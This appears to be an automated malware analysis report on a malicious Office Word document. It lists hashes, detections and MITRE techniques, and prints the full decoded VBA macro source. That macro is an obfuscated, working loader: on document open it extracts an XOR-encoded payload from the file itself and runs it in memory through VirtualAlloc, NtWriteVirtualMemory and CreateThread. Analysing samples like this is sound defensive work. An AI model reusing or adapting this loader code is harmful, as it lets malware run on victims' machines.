Office (OLE) malware analysis — malicious · 9db87447dc884408

MALICIOUS

Office (OLE)

37.2 KB Created: 2017-07-22 14:57:00 Authoring application: Microsoft Office Word First seen: 2018-03-04

MD5: 9e689977de74d7dead9a04de7625a535 SHA-1: fdeaa3811efacf3dd700bc8da86315c1f6a4e561 SHA-256: 9db87447dc884408b15430068e89b4ddb5897f87868cc9c74a46d8f5c2f7f0a6

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample is a malicious Office document containing VBA macros. The macros utilize API calls such as VirtualAlloc and CreateThread, indicating an attempt to allocate memory and execute code. The presence of a 'macros.bas' file and the ClamAV detection 'Doc.Downloader.Powload-6809817-0' strongly suggest that this document is designed to download and execute a secondary payload, likely using PowerShell given the heuristic firings.

Heuristics 7

ClamAV: Doc.Downloader.Powload-6809817-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Powload-6809817-0
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC

Reference to VirtualAlloc API
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Public Sub Document_Open()
    sFDscPENkZcakNaiwFAc
```
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Sub Workbook_Open()
    Document_Open
```
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4807 bytes
SHA-256: `0fa28bfeea38ba2a7aebdab158aae543bfef62c98bb4d12e7d91166f38d8f22a`
Detection ClamAV: No threats found Obfuscation or payload: likely 37 of 72 identifiers look randomly generated (e.g. 'dcmbPzFkxULfrVyxZXuFYIZdRROMGfkAEUIJatYm') — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Option Explicit #If VBA7 Then Private Declare PtrSafe Function WaiPxKyHvxHeL Lib "kernel32" Alias "CreateThread" (ByVal oobfZtFb As Long, ByVal CNgpDFBaDdpF As Long, ByVal QtvQVVVlnoeEaAuRf As LongPtr, fjulzkAaPGPTBRBPyIKjyJgdozbLD As Long, ByVal hixejwe As Long, TkpUgovtMnckcLhVAvd As Long) As LongPtr Private Declare PtrSafe Function OzUDDRIVMNIsdvbBDOtMITbzxw Lib "kernel32" Alias "VirtualAlloc" (ByVal bzsCbU As Long, ByVal xxJPcFwl As Long, ByVal eNeodbDKKF As Long, ByVal cKsHIe As Long) As LongPtr Private Declare PtrSafe Function NtWriteVirtualMemory Lib "NTDLL" (ByVal ECuyVijN As Long, ByVal VsJMIeNLlHoZaVIRwQfMebhX As Long, ByVal SIRGSWepmHrbSvXW As String, ByVal waQiDHLGyrdaKTlLpPvWe As Long, ByRef LkJNnqQDviPwFg As Long) As Long #Else Private Declare Function WaiPxKyHvxHeL Lib "kernel32" Alias "CreateThread" (ByVal oobfZtFb As Long, ByVal CNgpDFBaDdpF As Long, ByVal QtvQVVVlnoeEaAuRf As Long, fjulzkAaPGPTBRBPyIKjyJgdozbLD As Long, ByVal hixejwe As Long, TkpUgovtMnckcLhVAvd As Long) As Long Private Declare Function OzUDDRIVMNIsdvbBDOtMITbzxw Lib "kernel32" Alias "VirtualAlloc" (ByVal bzsCbU As Long, ByVal xxJPcFwl As Long, ByVal eNeodbDKKF As Long, ByVal cKsHIe As Long) As Long Private Declare Function NtWriteVirtualMemory Lib "NTDLL" (ByVal ECuyVijN As Long, ByVal VsJMIeNLlHoZaVIRwQfMebhX As Long, ByVal SIRGSWepmHrbSvXW As String, ByVal waQiDHLGyrdaKTlLpPvWe As Long, ByRef LkJNnqQDviPwFg As Long) As Long #End If Const KFABtYYXdGnyHhelRhqXIeppQ = &H1000 Const VKYYWgSsSVtwjhEXVJ = &H40 Public Sub sFDscPENkZcakNaiwFAc() Dim hTWyJvFUaKW() As Byte hTWyJvFUaKW = HzFeaIgHEIpgNCyTlQraWB(ActiveDocument.FullName) Dim axvWXieFsOtgWrXiTODjZtl As String axvWXieFsOtgWrXiTODjZtl = StrConv(hTWyJvFUaKW, 64) Dim GTsuYSjogokqElzxwwUsAPC GTsuYSjogokqElzxwwUsAPC = Split(axvWXieFsOtgWrXiTODjZtl, "dcmbPzFkxULfrVyxZXuFYIZdRROMGfkAEUIJatYmHRHQrBLVLpXpwDUvdjjXKSEsKlBxmOwFYhYhajLpgSbqhUdaZnGRjbBOnpfgaoIWSrqpFNuTxURSRnkQhAxZiFvXFjTLeFpRjexPDOumSMtpjJXZepYzQJOnVtJvTJPREaIMPumsglgvlgOW") Dim xwbmgNNHlJqdP As String Dim sxzMONfIJ As String Dim IhDCINUxbMdgPbxPfIxYhsquLxvI As String sxzMONfIJ = StrConv(StrConv(GTsuYSjogokqElzxwwUsAPC(UBound(GTsuYSjogokqElzxwwUsAPC)), 64), 128) IhDCINUxbMdgPbxPfIxYhsquLxvI = Mid$(sxzMONfIJ, 3, Len(sxzMONfIJ)) xwbmgNNHlJqdP = XKMdzgMHnkGdDZxflIxpZIwkKO("UGOGQaAqkUkfYs", IhDCINUxbMdgPbxPfIxYhsquLxvI) Dim irpIlXZdAhGpkKRcnYfKhFoojSv As Long Dim isKiGvHlFcNaWcrlmFiLseqZQYMC As Long irpIlXZdAhGpkKRcnYfKhFoojSv = OzUDDRIVMNIsdvbBDOtMITbzxw(0, Len(xwbmgNNHlJqdP), KFABtYYXdGnyHhelRhqXIeppQ, VKYYWgSsSVtwjhEXVJ) isKiGvHlFcNaWcrlmFiLseqZQYMC = NtWriteVirtualMemory(-1, irpIlXZdAhGpkKRcnYfKhFoojSv, xwbmgNNHlJqdP, Len(xwbmgNNHlJqdP), 0) isKiGvHlFcNaWcrlmFiLseqZQYMC = WaiPxKyHvxHeL(0, 0, irpIlXZdAhGpkKRcnYfKhFoojSv, 0, 0, 0) End Sub Public Function HzFeaIgHEIpgNCyTlQraWB(ByVal WisADeVVvILPvMvOUlQStXaak As String) As Byte() Dim sxzMONfIJ As Long Dim IhDCINUxbMdgPbxPfIxYhsquLxvI() As Byte sxzMONfIJ = FreeFile If LenB(Dir(WisADeVVvILPvMvOUlQStXaak)) Then Open WisADeVVvILPvMvOUlQStXaak For Binary Access Read As sxzMONfIJ ReDim IhDCINUxbMdgPbxPfIxYhsquLxvI(LOF(sxzMONfIJ) - 1&) As Byte Get sxzMONfIJ, , IhDCINUxbMdgPbxPfIxYhsquLxvI Close sxzMONfIJ Else Err.Raise 53 End If HzFeaIgHEIpgNCyTlQraWB = IhDCINUxbMdgPbxPfIxYhsquLxvI Erase IhDCINUxbMdgPbxPfIxYhsquLxvI End Function Public Sub Document_Open() sFDscPENkZcakNaiwFAc End Sub Sub Workbook_Open() Document_Open End Sub Public Function XKMdzgMHnkGdDZxflIxpZIwkKO(RjRlrlDdcrdq As String, KiSyRVEsSpAPYtUpoBsKQVxwYoR As String) As String Dim VvOhrCERPXtOkXYUqvtSJNOPKFeOK As Long Dim zDdFxxAsxwOcAqi As String Dim ATXDfCVZphGYwMxPgtx As Integer, KFABtYYXdGnyHhelRhqXIeppQ As Integer, a As Long For VvOhrCERPXtOkXYUqvtSJNOPKFeOK = 1 To Len(KiSyRVEsSpAPYtUpoBsKQVxwYoR) a = VvOhrCERPXtOkXYUqvtSJNOPKFeOK Mod Len(RjRlrlDdcrdq) If a = 0 Then a = Len(RjRlrlDdcrdq) ATXDfCVZphGYwMxPgtx = Asc(Mid$(KiSyRVEsSpAPYtUpoBsKQVxwYoR, VvOhrCERPXtOkXYUqvtSJNOPKFeOK, 1)) KFABtYYXdGnyHhelRhqXIeppQ = Asc(Mid$(RjRlrlDdcrdq, a, 1)) zDdFxxAsxwOcAqi = zDdFxxAsxwOcAqi + Chr(ATXDfCVZphGYwMxPgtx Xor KFABtYYXdGnyHhelRhqXIeppQ) Next VvOhrCERPXtOkXYUqvtSJNOPKFeOK XKMdzgMHnkGdDZxflIxpZIwkKO = zDdFxxAsxwOcAqi End Function

Open this report in the interactive analyzer, or submit your own file for analysis.